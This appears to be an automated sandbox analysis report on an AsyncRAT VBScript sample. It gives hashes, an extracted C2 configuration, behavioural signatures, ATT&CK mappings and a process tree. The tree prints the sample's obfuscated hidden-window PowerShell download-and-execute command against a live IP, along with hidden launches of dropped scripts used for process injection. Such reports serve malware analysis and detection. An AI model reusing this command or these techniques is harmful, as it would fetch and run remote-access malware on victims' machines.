asyncrat | 551aa52e13e8dcb3fbfc476d7bd3eaf46ceeaebcffca2cc72b62ec76625be71e

Analysis

max time kernel
96s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28/01/2025, 12:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

551aa52e13e8dcb3fbfc476d7bd3eaf46ceeaebcffca2cc72b62ec76625be71e.vbs
Size

6KB
MD5

2cac56c224c4fe93c8133ce8997d6698
SHA1

b02d87284e587e5b59af0ed6d984faf5d05c687d
SHA256

551aa52e13e8dcb3fbfc476d7bd3eaf46ceeaebcffca2cc72b62ec76625be71e
SHA512

20565ec2837975a30b2b9bafb92e33082360f34c5ab1c3ce6eba0c138d0af5a4311ef71ee35c6fd845b445aaf5e5746ce17f9b6033019390de2041b53dbb3e4e
SSDEEP

48:edClIClIClIClIClIClIClIClIClIClIClIClIClIClIClIClIClIClIClIClICX:eLPXyTuGZOrHTu5Vibru

Score

10^/10

asyncrat 00000001 discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

00000001

81.10.39.58:7077

Mutex

AsyncMutex_alosh

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
14	1112	powershell.exe
27	1112	powershell.exe
29	1112	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1112	powershell.exe
2952	powershell.exe
4388	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	api.ipify.org
27	api.ipify.org

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2952 set thread context of 3436	2952	powershell.exe	95
PID 4388 set thread context of 3732	4388	powershell.exe	109

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1112	powershell.exe
1112	powershell.exe
2952	powershell.exe
2952	powershell.exe
2952	powershell.exe
2952	powershell.exe
3436	aspnet_compiler.exe
4388	powershell.exe
4388	powershell.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeIncreaseQuotaPrivilege	1112	powershell.exe
Token: SeSecurityPrivilege	1112	powershell.exe
Token: SeTakeOwnershipPrivilege	1112	powershell.exe
Token: SeLoadDriverPrivilege	1112	powershell.exe
Token: SeSystemProfilePrivilege	1112	powershell.exe
Token: SeSystemtimePrivilege	1112	powershell.exe
Token: SeProfSingleProcessPrivilege	1112	powershell.exe
Token: SeIncBasePriorityPrivilege	1112	powershell.exe
Token: SeCreatePagefilePrivilege	1112	powershell.exe
Token: SeBackupPrivilege	1112	powershell.exe
Token: SeRestorePrivilege	1112	powershell.exe
Token: SeShutdownPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeSystemEnvironmentPrivilege	1112	powershell.exe
Token: SeRemoteShutdownPrivilege	1112	powershell.exe
Token: SeUndockPrivilege	1112	powershell.exe
Token: SeManageVolumePrivilege	1112	powershell.exe
Token: 33	1112	powershell.exe
Token: 34	1112	powershell.exe
Token: 35	1112	powershell.exe
Token: 36	1112	powershell.exe
Token: SeIncreaseQuotaPrivilege	1112	powershell.exe
Token: SeSecurityPrivilege	1112	powershell.exe
Token: SeTakeOwnershipPrivilege	1112	powershell.exe
Token: SeLoadDriverPrivilege	1112	powershell.exe
Token: SeSystemProfilePrivilege	1112	powershell.exe
Token: SeSystemtimePrivilege	1112	powershell.exe
Token: SeProfSingleProcessPrivilege	1112	powershell.exe
Token: SeIncBasePriorityPrivilege	1112	powershell.exe
Token: SeCreatePagefilePrivilege	1112	powershell.exe
Token: SeBackupPrivilege	1112	powershell.exe
Token: SeRestorePrivilege	1112	powershell.exe
Token: SeShutdownPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeSystemEnvironmentPrivilege	1112	powershell.exe
Token: SeRemoteShutdownPrivilege	1112	powershell.exe
Token: SeUndockPrivilege	1112	powershell.exe
Token: SeManageVolumePrivilege	1112	powershell.exe
Token: 33	1112	powershell.exe
Token: 34	1112	powershell.exe
Token: 35	1112	powershell.exe
Token: 36	1112	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	3436	aspnet_compiler.exe
Token: SeDebugPrivilege	4388	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3436	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 5048 wrote to memory of 1112	5048	WScript.exe	82
PID 5048 wrote to memory of 1112	5048	WScript.exe	82
PID 4152 wrote to memory of 3096	4152	WScript.exe	86
PID 4152 wrote to memory of 3096	4152	WScript.exe	86
PID 3096 wrote to memory of 920	3096	net.exe	88
PID 3096 wrote to memory of 920	3096	net.exe	88
PID 4152 wrote to memory of 2164	4152	WScript.exe	89
PID 4152 wrote to memory of 2164	4152	WScript.exe	89
PID 2164 wrote to memory of 2952	2164	cmd.exe	91
PID 2164 wrote to memory of 2952	2164	cmd.exe	91
PID 2952 wrote to memory of 232	2952	powershell.exe	94
PID 2952 wrote to memory of 232	2952	powershell.exe	94
PID 2952 wrote to memory of 232	2952	powershell.exe	94
PID 2952 wrote to memory of 3436	2952	powershell.exe	95
PID 2952 wrote to memory of 3436	2952	powershell.exe	95
PID 2952 wrote to memory of 3436	2952	powershell.exe	95
PID 2952 wrote to memory of 3436	2952	powershell.exe	95
PID 2952 wrote to memory of 3436	2952	powershell.exe	95
PID 2952 wrote to memory of 3436	2952	powershell.exe	95
PID 2952 wrote to memory of 3436	2952	powershell.exe	95
PID 2952 wrote to memory of 3436	2952	powershell.exe	95
PID 4124 wrote to memory of 3884	4124	WScript.exe	103
PID 4124 wrote to memory of 3884	4124	WScript.exe	103
PID 3884 wrote to memory of 640	3884	net.exe	105
PID 3884 wrote to memory of 640	3884	net.exe	105
PID 4124 wrote to memory of 404	4124	WScript.exe	106
PID 4124 wrote to memory of 404	4124	WScript.exe	106
PID 404 wrote to memory of 4388	404	cmd.exe	108
PID 404 wrote to memory of 4388	404	cmd.exe	108
PID 4388 wrote to memory of 3732	4388	powershell.exe	109
PID 4388 wrote to memory of 3732	4388	powershell.exe	109
PID 4388 wrote to memory of 3732	4388	powershell.exe	109
PID 4388 wrote to memory of 3732	4388	powershell.exe	109
PID 4388 wrote to memory of 3732	4388	powershell.exe	109
PID 4388 wrote to memory of 3732	4388	powershell.exe	109
PID 4388 wrote to memory of 3732	4388	powershell.exe	109
PID 4388 wrote to memory of 3732	4388	powershell.exe	109

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\551aa52e13e8dcb3fbfc476d7bd3eaf46ceeaebcffca2cc72b62ec76625be71e.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$LNxzdRYufhOZ='IeX(NeW-OBJeCT NeT.W';$ykcbidfsOtpw='eBCLIeNT).DOWNLO';$qlwvdNoWtnfz='repoooos(''http://81.10.39.58:8080/test//Update.php'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($LNxzdRYufhOZ+$ykcbidfsOtpw+$qlwvdNoWtnfz);
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1112

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\SiAs3okYmV.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4152
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\SiAs3okYmV.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\SiAs3okYmV.ps1'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2952
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:232
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3436

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\SiAs3okYmV.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4124
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\SiAs3okYmV.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\SiAs3okYmV.ps1'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4388
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7e521614944a4b380196880d6e64c960

SHA1
fd6de407ee23a9adbd73b3cd981d00097b58e4b2

SHA256
a43c1a1768dc9b337b5c7e4bdd0147fdc784067e1b1a731b08dd068b5114e12c

SHA512
0ce7556131a62805c2db2277613e9e29119f275fc453e0d77cfa84c7c934deb6079b0d39aacbedb88497988ec67448a76cbb69d907fd6d5dd6e0cf1e80b4d174

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qss3phxb.5sp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Music\SiAs3okYmV.bat

Filesize
2KB

MD5
6aa58a7abea621b5211eb4c42d6ec1ea

SHA1
e4049d150a7d638a55edeed2843b32f5e35cfddf

SHA256
5c065916072e24e9bb981615736b17c49b1af66569bd40be2fb92b382af339a6

SHA512
b066df928c0ab54f71c307b1b54a7edc31bd6bc73a1d9f9507985cc7c946147eb0710bd350931574e7b8983900d9108407836cac6521e821c90bdbda83011d52

Download Submit
C:\Users\Public\Music\SiAs3okYmV.ps1

Filesize
453KB

MD5
6968bc51c5854405cdec0fd27c3d8e6d

SHA1
9023ac9b353eee6ed3e92ab0ef0b9995f63e33c3

SHA256
67f2ea51addfc8ed3f57a5f24540018661fb09966fda42a18281ff57c371d768

SHA512
682a3fbe4203b5abcbeb56e73f0a1a5b6b5537341128b4951dff865b04be27f82d07217995456407a6b620cfe0982ca216b0c0a6432d0ddca3a8b3b01d25fa02

Download Submit
C:\Users\Public\Music\SiAs3okYmV.vbs

Filesize
4KB

MD5
a394aaef7f8d5d0ed06c222db346b034

SHA1
08ba94fca08e9eff962054033805b4531bdd1943

SHA256
cb46db8ccca7c6a7064286b14d3edb341b3e75f3eab978fadbd57a7d159c3fba

SHA512
163fcf750e4c46c8a29783bb96c9d4e44b1bf1e1be25e25534ece40ba953bd115d61de476793fb549ce9cab1348be3e34b140aa4f7f9eb12f5a3d72e78825ed1

Download Submit
memory/1112-36-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

Filesize
10.8MB

Download
memory/1112-45-0x00000237AE190000-0x00000237AE352000-memory.dmp

Filesize
1.8MB

Download
memory/1112-12-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

Filesize
10.8MB

Download
memory/1112-51-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

Filesize
10.8MB

Download
memory/1112-6-0x00000237AD0E0000-0x00000237AD102000-memory.dmp

Filesize
136KB

Download
memory/1112-35-0x00007FF8221A3000-0x00007FF8221A5000-memory.dmp

Filesize
8KB

Download
memory/1112-0-0x00007FF8221A3000-0x00007FF8221A5000-memory.dmp

Filesize
8KB

Download
memory/1112-11-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

Filesize
10.8MB

Download
memory/1112-47-0x00000237AE890000-0x00000237AEDB8000-memory.dmp

Filesize
5.2MB

Download
memory/1112-46-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

Filesize
10.8MB

Download
memory/1112-18-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

Filesize
10.8MB

Download
memory/1112-44-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

Filesize
10.8MB

Download
memory/2952-31-0x0000021057590000-0x000002105759C000-memory.dmp

Filesize
48KB

Download
memory/3436-43-0x0000000006840000-0x00000000068A6000-memory.dmp

Filesize
408KB

Download
memory/3436-42-0x0000000006D50000-0x0000000006DEC000-memory.dmp

Filesize
624KB

Download
memory/3436-39-0x0000000005B40000-0x0000000005B4A000-memory.dmp

Filesize
40KB

Download
memory/3436-38-0x0000000005B50000-0x0000000005BE2000-memory.dmp

Filesize
584KB

Download
memory/3436-37-0x0000000005F20000-0x00000000064C4000-memory.dmp

Filesize
5.6MB

Download
memory/3436-32-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download